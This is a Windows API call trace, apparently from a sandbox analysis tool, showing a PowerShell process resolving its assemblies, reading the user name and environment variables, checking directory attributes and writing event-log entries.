	[0400.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0400.789] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0400.789] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0400.790] CoTaskMemFree (pv=0x1b7f8350) 
	[0400.790] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0400.790] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0400.791] CoTaskMemFree (pv=0x2f4ad0) 
	[0400.792] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4f0e8*="Certificate", lpRawData=0x2f4ee78) returned 1
	[0401.202] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0401.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.202] CoTaskMemFree (pv=0x34e250) 
	[0401.206] GetLogicalDrives () returned 0x4
	[0401.206] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0401.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0401.207] CoTaskMemAlloc (cb=0x20e) returned 0x347160
	[0401.207] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x347160 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0401.207] CoTaskMemFree (pv=0x347160) 
	[0401.208] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0401.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.208] CoTaskMemFree (pv=0x34e250) 
	[0401.209] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0401.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.209] CoTaskMemFree (pv=0x34e250) 
	[0401.225] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0401.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.225] CoTaskMemFree (pv=0x34e250) 
	[0401.226] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0401.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.226] CoTaskMemFree (pv=0x34e250) 
	[0401.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.227] SetErrorMode (uMode=0x1) returned 0x1
	[0401.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d490 | out: lpFileInformation=0x16d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.227] SetErrorMode (uMode=0x1) returned 0x1
	[0401.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.227] SetErrorMode (uMode=0x1) returned 0x1
	[0401.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d490 | out: lpFileInformation=0x16d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.228] SetErrorMode (uMode=0x1) returned 0x1
	[0401.228] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0401.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0401.228] CoTaskMemFree (pv=0x34e250) 
	[0401.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.234] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0401.234] SetErrorMode (uMode=0x1) returned 0x1
	[0401.234] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d450 | out: lpFileInformation=0x16d450*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0401.234] SetErrorMode (uMode=0x1) returned 0x1
	[0401.234] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0401.234] SetErrorMode (uMode=0x1) returned 0x1
	[0401.234] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d450 | out: lpFileInformation=0x16d450*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0401.234] SetErrorMode (uMode=0x1) returned 0x1
	[0401.235] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0401.235] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0401.235] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.641] SetErrorMode (uMode=0x1) returned 0x1
	[0401.641] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d450 | out: lpFileInformation=0x16d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0401.641] SetErrorMode (uMode=0x1) returned 0x1
	[0401.641] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.641] SetErrorMode (uMode=0x1) returned 0x1
	[0401.641] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d450 | out: lpFileInformation=0x16d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0401.642] SetErrorMode (uMode=0x1) returned 0x1
	[0401.642] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.642] SetErrorMode (uMode=0x1) returned 0x1
	[0401.642] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d450 | out: lpFileInformation=0x16d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.642] SetErrorMode (uMode=0x1) returned 0x1
	[0401.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.642] SetErrorMode (uMode=0x1) returned 0x1
	[0401.642] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d450 | out: lpFileInformation=0x16d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.642] SetErrorMode (uMode=0x1) returned 0x1
	[0401.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.643] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.643] SetErrorMode (uMode=0x1) returned 0x1
	[0401.643] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d490 | out: lpFileInformation=0x16d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0401.643] SetErrorMode (uMode=0x1) returned 0x1
	[0401.643] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.643] SetErrorMode (uMode=0x1) returned 0x1
	[0401.643] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d490 | out: lpFileInformation=0x16d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0401.644] SetErrorMode (uMode=0x1) returned 0x1
	[0401.644] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0401.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.644] SetErrorMode (uMode=0x1) returned 0x1
	[0401.644] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d490 | out: lpFileInformation=0x16d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.644] SetErrorMode (uMode=0x1) returned 0x1
	[0401.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.644] SetErrorMode (uMode=0x1) returned 0x1
	[0401.644] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d490 | out: lpFileInformation=0x16d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.645] SetErrorMode (uMode=0x1) returned 0x1
	[0401.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0401.647] SetErrorMode (uMode=0x1) returned 0x1
	[0401.647] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d750 | out: lpFileInformation=0x16d750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0401.647] SetErrorMode (uMode=0x1) returned 0x1
	[0401.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.679] CoTaskMemAlloc (cb=0x804) returned 0x1b7fa350
	[0401.679] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7fa350, nSize=0x16dab8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16dab8) returned 0x1
	[0402.141] CoTaskMemFree (pv=0x1b7fa350) 
	[0402.141] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0402.141] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16daf8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16daf8) returned 1
	[0402.141] CoTaskMemFree (pv=0x2f4ad0) 
	[0402.141] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f87dd0*="Available", lpRawData=0x2f87b60) returned 1
	[0402.572] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0402.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.572] CoTaskMemFree (pv=0x34e250) 
	[0402.572] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0402.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.572] CoTaskMemFree (pv=0x34e250) 
	[0402.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.574] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0402.574] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0402.574] CoTaskMemFree (pv=0x34e250) 
	[0402.574] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0402.574] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0402.575] CoTaskMemFree (pv=0x34e250) 
	[0402.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.576] GetCurrentProcessId () returned 0x68c
	[0402.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
